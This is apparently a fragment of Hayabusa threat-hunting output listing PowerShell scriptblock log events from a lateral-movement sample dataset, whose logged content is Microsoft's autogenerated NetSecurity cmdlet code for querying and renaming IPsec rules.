[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains 